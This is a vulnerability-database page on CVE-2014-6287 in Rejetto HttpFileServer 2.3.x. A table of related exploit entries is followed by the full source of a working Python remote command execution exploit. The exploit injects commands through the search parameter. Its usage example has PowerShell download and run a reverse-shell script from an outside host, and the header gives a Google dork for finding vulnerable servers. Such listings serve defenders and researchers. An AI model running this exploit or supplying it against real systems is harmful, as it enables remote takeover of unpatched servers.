| Reporter | Title | Published | Views | Family All 42 |
|---|---|---|---|---|
| Exploit for Code Injection in Rejetto Http_File_Server | 25 Jan 202622:51 | – | githubexploit | |
| Exploit for Code Injection in Rejetto Http_File_Server | 16 May 202623:24 | – | githubexploit | |
| Exploit for Code Injection in Rejetto Http_File_Server | 10 Mar 202615:31 | – | githubexploit | |
| Exploit for Code Injection in Rejetto Http_File_Server | 16 Sep 202517:44 | – | githubexploit | |
| HttpFileServer 2.3.x Remote Command Execution Vulnerability | 13 Sep 201400:00 | – | zdt | |
| Rejetto HttpFileServer Remote Command Execution Exploit | 9 Oct 201400:00 | – | zdt | |
| Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | 4 Jan 201600:00 | – | zdt | |
| HFS Http File Server 2.3.x - Remote Command Execution Exploit (3) | 23 Feb 202100:00 | – | zdt | |
| CVE-2014-6287 | 7 Oct 201400:00 | – | attackerkb | |
| CVE-2014-6287 | 15 Sep 201400:00 | – | circl |
# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: Óscar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
#!/usr/bin/python3
# Usage : python3 Exploit.py <RHOST> <Target RPORT> <Command>
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
import urllib3
import sys
import urllib.parse
try:
http = urllib3.PoolManager()
url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
print(url)
response = http.request('GET', url)
except Exception as ex:
print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
print(ex)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation